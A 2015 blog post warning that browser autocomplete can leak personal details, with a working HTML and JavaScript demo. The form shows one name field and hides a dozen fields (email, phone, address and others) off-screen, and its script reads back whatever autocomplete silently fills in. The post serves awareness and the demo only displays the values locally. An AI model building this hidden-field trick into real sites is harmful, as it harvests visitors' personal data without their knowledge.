February 6, 2015 · Front-end Code Hack

Careful with browser autocomplete, someone might steal your details

I've stumbled across a youtube video by WhiteHat Security. He shows a very easy way to stole visitor details when they use autocomplete. For me, it's pretty scary on how easy it is. Although its very rare for me using autocomplete, but I've used it in one or two occation. I will try to avoid using it from now on and I suggest you do the same too.

OK, lets try the technique in the video. I've wrote some sample code to play around. Try it in few browsers, just to make sure how someone can steal your details easily with autocomplete. Don't worry, the example below doesn't save any details that you've entered, so feel free to try it. :)

Let's say you are visiting a website that requesting for you to enter your name.

Please enter your name:

Instead of just a name, if you were using autocomplete, here's some details that the website can get from you:

Enter field name above with autocomplete.



...and heres the code:

<form id="form" name="form">  
  Enter your name: <input type="text" name="name"><br>
  <div style="position: absolute; left:-999em;">
    <input type="text" name="firstname">
    <input type="text" name="lastname">
    <input type="text" name="email">
    <input type="text" name="jobtitle">
    <input type="text" name="organization">
    <input type="text" name="phone">
    <input type="text" name="firstname">
    <input type="text" name="street">
    <input type="text" name="city">
    <input type="text" name="state">
    <input type="text" name="country">
    <input type="text" name="postalcode">
  </div>
</form>  
<hr>  
<pre id="result"></pre>  
<script type="text/javascript">  
document.form.name.addEventListener('change', show);  
var elements = document.form.elements;  
var result = document.getElementById('result');  
function show(){  
    var output = '';
    setTimeout(function(){
        for(var i=0; i<elements.length; i++){
            if(elements[i].value)
            output += elements[i].name + ': '+ elements[i].value + '\n';
        }
        result.innerText = output;
    }, 1000);
}
</script>  
Comments powered by Disqus